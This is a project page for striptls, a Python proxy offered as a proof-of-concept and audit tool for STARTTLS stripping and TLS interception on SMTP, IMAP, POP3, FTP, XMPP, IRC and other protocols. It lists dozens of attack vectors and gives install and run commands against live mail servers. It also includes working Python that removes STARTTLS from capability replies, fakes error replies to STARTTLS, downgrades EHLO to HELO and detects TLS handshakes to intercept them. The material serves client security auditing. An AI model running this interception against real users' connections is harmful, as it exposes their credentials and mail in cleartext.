striptls: proxy poc implementation of STARTTLS stripping attacks

striptls

striptls – auditing proxy

proxy poc implementation of STARTTLS stripping attacks.

A generic TCP proxy implementation and audit tool to perform protocol-independent SSL/TLS interception and STARTTLS stripping attacks on SMTP, POP3, IMAP, FTP, NNTP, XMPP, ACAP and IRC.

🏆 Trophies

Vectors

  • GENERIC
      • Intercept – protocol independent ssl/tls interception. peeks for TLS Handshake, converts socket to tls (tls-to-tls proxy)
      • InboundIntercept – protocol independent ssl/tls interception for the inbound channel only (tls-to-plain proxy)
  • SMTP
      • SMTP.StripFromCapabilities – server response capability patch
      • SMTP.StripWithInvalidResponseCode – client STARTTLS stripping, invalid response code
      • SMTP.UntrustedIntercept – STARTTLS interception (client and server talking ssl) (requires server.pem in pwd)
      • SMTP.StripWithTemporaryError
      • SMTP.StripWithError
      • SMTP.ProtocolDowngradeStripExtendedMode
      • SMTP.InjectCommand
      • SMTP.InboundStarttlsProxy – (starttls-to-plain proxy)
  • POP3
      • POP3.StripFromCapabilities
      • POP3.StripWithError
      • POP3.UntrustedIntercept
  • IMAP
      • IMAP.StripFromCapabilities
      • IMAP.StripWithError
      • IMAP.UntrustedIntercept
      • IMAP.ProtocolDowngradeToV2
  • FTP
      • FTP.StripFromCapabilities
      • FTP.StripWithError
      • FTP.UntrustedIntercept
  • NNTP
      • NNTP.StripFromCapabilities
      • NNTP.StripWithError
      • NNTP.UntrustedIntercept
  • XMPP
      • XMPP.StripFromCapabilities
      • XMPP.StripInboundTLS
      • XMPP.UntrustedIntercept
  • ACAP (untested)
      • ACAP.StripFromCapabilities
      • ACAP.StripWithError
      • ACAP.UntrustedIntercept
  • IRC
      • IRC.StripFromCapabilities
      • IRC.StripWithError
      • IRC.UntrustedIntercept
      • IRC.StripWithNotRegistered
      • IRC.StripCAPWithNotRegistered
      • IRC.StripWithSilentDrop
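As an added illustration of what the SMTP vectors above do on the wire (example code written for this page, not striptls's own implementation): a capability patch that removes STARTTLS from the server's EHLO reply, the three client-side "answer STARTTLS with something other than 220" variants, the EHLO-to-HELO downgrade, and the ClientHello peek that GENERIC.Intercept relies on. The exact reply strings used for the error vectors, the sample EHLO reply and all function names are this example's assumptions, not the tool's.

```python
import re

# Constructed sample: a server EHLO reply that advertises STARTTLS.
EHLO_REPLY = (b"250-mail.example.com Hello client\r\n"
              b"250-SIZE 35882577\r\n"
              b"250-STARTTLS\r\n"
              b"250 ENHANCEDSTATUSCODES\r\n")

# Replies returned to the client's STARTTLS instead of forwarding it to the
# server. The strings are this example's choice; only the code classes matter:
# a permanent 5xx, the RFC 3207 temporary 454, or a code that is not 220.
STARTTLS_REPLIES = {
    "SMTP.StripWithError": b"502 Command not implemented\r\n",
    "SMTP.StripWithTemporaryError": b"454 TLS not available due to temporary reason\r\n",
    "SMTP.StripWithInvalidResponseCode": b"200 Ready to start TLS\r\n",
}


def strip_from_capabilities(ehlo_reply: bytes) -> bytes:
    """SMTP.StripFromCapabilities: drop the STARTTLS line from a multi-line 250
    reply so the client never learns TLS is on offer."""
    lines = ehlo_reply.rstrip(b"\r\n").split(b"\r\n")
    kept = [l for l in lines if not re.match(rb"250[- ]STARTTLS\b", l, re.I)]
    if not kept:
        return ehlo_reply
    # RFC 5321: only the last line of a multi-line reply uses "250 " (space).
    # If STARTTLS was the final line, the new final line must be re-terminated.
    kept[-1] = kept[-1][:3] + b" " + kept[-1][4:]
    return b"\r\n".join(kept) + b"\r\n"


def mangle_client_command(vector: str, line: bytes):
    """Client-side stripping: answer STARTTLS ourselves for the chosen vector.
    Returns the reply to send back, or None to forward the command untouched."""
    if line.strip().upper() == b"STARTTLS" and vector in STARTTLS_REPLIES:
        return STARTTLS_REPLIES[vector]
    return None


def downgrade_ehlo(line: bytes) -> bytes:
    """SMTP.ProtocolDowngradeStripExtendedMode: rewrite EHLO to HELO so the server
    answers without an extension list, and therefore without STARTTLS."""
    if line[:5].upper() == b"EHLO ":
        return b"HELO " + line[5:]
    return line


def looks_like_tls_client_hello(peek: bytes) -> bool:
    """GENERIC.Intercept: decide from the first bytes a peer sends whether it is
    starting a TLS handshake. A TLS record starts with content type 0x16
    (handshake), version 0x03 0x0X and a 2-byte length; the handshake message
    inside starts with type 0x01 (ClientHello). SSLv2-style hellos are ignored."""
    return (len(peek) >= 6 and peek[0] == 0x16 and peek[1] == 0x03
            and peek[2] <= 0x04 and peek[5] == 0x01)


if __name__ == "__main__":
    print(strip_from_capabilities(EHLO_REPLY).decode())
    for vector in STARTTLS_REPLIES:
        print(vector, mangle_client_command(vector, b"STARTTLS\r\n"))
    print(downgrade_ehlo(b"EHLO client.example.org\r\n"))
    print(looks_like_tls_client_hello(bytes.fromhex("160301010001")))
```

Note the edge case in the capability patch: if the server lists STARTTLS as the last line of its reply, simply deleting it leaves the client waiting on a "250-" continuation forever, so the new last line has to be rewritten with a space separator.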

Download

git clone https://github.com/tintinweb/striptls.git
cd striptls
python setup.py install

Usage

#> python -m striptls --help    # from pip/setup.py

#> python striptls --help # from source / root folder
Usage: striptls.py [options]

example: striptls.py --listen 0.0.0.0:25 --remote mail.server.tld:25

Options:
  -h, --help            show this help message and exit
  -q, --quiet           be quiet [default: True]
  -l LISTEN, --listen=LISTEN
                        listen ip:port [default: 0.0.0.0:<remote_port>]
  -r REMOTE, --remote=REMOTE
                        remote target ip:port to forward sessions to
  -k KEY, --key=KEY     SSL Certificate and Private key file to use, PEM
                        format assumed [default: server.pem]
  -s, --generic-ssl-intercept
                        dynamically intercept SSL/TLS
  -b BUFFER_SIZE, --bufsiz=BUFFER_SIZE
  -x VECTORS, --vectors=VECTORS
                        Comma separated list of vectors. Use 'ALL' (default)
                        to select all vectors, 'NONE' for tcp/ssl proxy mode.
                        Available vectors: ACAP.StripFromCapabilities,
                        ACAP.StripWithError, ACAP.UntrustedIntercept,
                        FTP.StripFromCapabilities, FTP.StripWithError,
                        FTP.UntrustedIntercept, GENERIC.Intercept,
                        IMAP.ProtocolDowngradeToV2,
                        IMAP.StripFromCapabilities, IMAP.StripWithError,
                        IMAP.UntrustedIntercept,
                        IRC.StripCAPWithNotRegistered,
                        IRC.StripFromCapabilities, IRC.StripWithError,
                        IRC.StripWithNotRegistered, IRC.StripWithSilentDrop,
                        IRC.UntrustedIntercept, NNTP.StripFromCapabilities,
                        NNTP.StripWithError, NNTP.UntrustedIntercept,
                        POP3.StripFromCapabilities, POP3.StripWithError,
                        POP3.UntrustedIntercept, SMTP.InboundStarttlsProxy,
                        SMTP.InjectCommand,
                        SMTP.ProtocolDowngradeStripExtendedMode,
                        SMTP.StripFromCapabilities, SMTP.StripWithError,
                        SMTP.StripWithInvalidResponseCode,
                        SMTP.StripWithTemporaryError, SMTP.UntrustedIntercept,
                        XMPP.StripFromCapabilities, XMPP.StripInboundTLS,
                        XMPP.UntrustedIntercept [default: ALL]


Example

                  inbound                    outbound

[inbound_peer]<------------->[listen:proxy]<------------->[outbound_peer/target]
  smtp-client                   striptls                  remote/target


local smtp-client -> localhost:8825 (proxy) -> mail.gmx.net:25

Generic SSL/TLS Interception

--generic-ssl-intercept is a global switch that enables generic SSL/TLS handshake detection and session conversion on every session: the proxy peeks at the first bytes a peer sends, and if they look like a TLS handshake it wraps the socket in TLS before applying any mangling. It can be combined with any mangle/vector. Because the proxy terminates the client's TLS session itself, it needs a certificate and key (-k, default server.pem), and a client that validates certificates will only accept the session if it trusts that certificate.

GENERIC.Intercept is the same handshake-detect-and-convert feature packaged as a mangle/vector, so it can be selected with -x like any other vector.

# python striptls.py -l 0.0.0.0:9999 -r mail.gmx.com:465 -x GENERIC.Intercept

Audit Mode

With the default vector selection (-x ALL), striptls runs in audit mode: it iterates through all protocol-specific cases on a per-client basis, applying one vector per session, and keeps track of which clients violate the STARTTLS protocol by continuing in cleartext after TLS was stripped or refused. Press Ctrl+C to abort the audit and print the results.

#> python striptls --listen localhost:8825 --remote=mail.gmx.net:25
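The bookkeeping an audit run like the one above needs, as an added example (not the project's own code): per client, record which vector it fell for, decided from the commands the client sent in cleartext after STARTTLS had been stripped or refused. The transcripts are constructed, and the class, function and client names are this example's own.

```python
from collections import defaultdict

# Commands that, sent in cleartext after STARTTLS was stripped or refused, mean
# the client went on without the protection it should have insisted on.
SENSITIVE = {b"AUTH", b"MAIL", b"RCPT", b"DATA"}


def client_proceeded_in_cleartext(client_lines):
    """Return the first sensitive verb the client sent without TLS, or None.
    Retrying STARTTLS or sending QUIT are acceptable reactions."""
    for line in client_lines:
        verb = line.strip().split(b" ", 1)[0].upper()
        if verb in SENSITIVE:
            return verb
        if verb == b"QUIT":
            return None
    return None


class Audit:
    """Tracks, per client and per vector, whether the client was strippable."""

    def __init__(self):
        self.results = defaultdict(dict)  # client -> vector -> verb or None

    def record(self, client, vector, client_lines):
        """client_lines: what the client sent after the vector was applied."""
        self.results[client][vector] = client_proceeded_in_cleartext(client_lines)

    def vulnerable(self, client):
        return sorted(v for v, verb in self.results[client].items() if verb)

    def report(self):
        return {client: self.vulnerable(client) for client in self.results}


def sample_run():
    """Constructed transcripts for two clients across two vectors."""
    audit = Audit()
    # A lax client: no STARTTLS in the capabilities? Fine, authenticate anyway.
    audit.record("lax-client", "SMTP.StripFromCapabilities",
                 [b"AUTH PLAIN AGpvZQBzM2NyM3Q=\r\n",
                  b"MAIL FROM:<joe@example.org>\r\n"])
    # The same client, STARTTLS answered with an error: carries on regardless.
    audit.record("lax-client", "SMTP.StripWithError",
                 [b"STARTTLS\r\n", b"MAIL FROM:<joe@example.org>\r\n"])
    # A strict client refuses to continue without TLS in both cases.
    audit.record("strict-client", "SMTP.StripFromCapabilities", [b"QUIT\r\n"])
    audit.record("strict-client", "SMTP.StripWithError",
                 [b"STARTTLS\r\n", b"QUIT\r\n"])
    return audit.report()


if __name__ == "__main__":
    for client, vectors in sample_run().items():
        print(client, "->", vectors or "not strippable")
```

A client that answers a stripped EHLO with AUTH is the worst case: it hands its credentials to the proxy in cleartext. A client that retries STARTTLS and then QUITs is behaving correctly and is not counted as a violation.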

Source: https://github.com/tintinweb/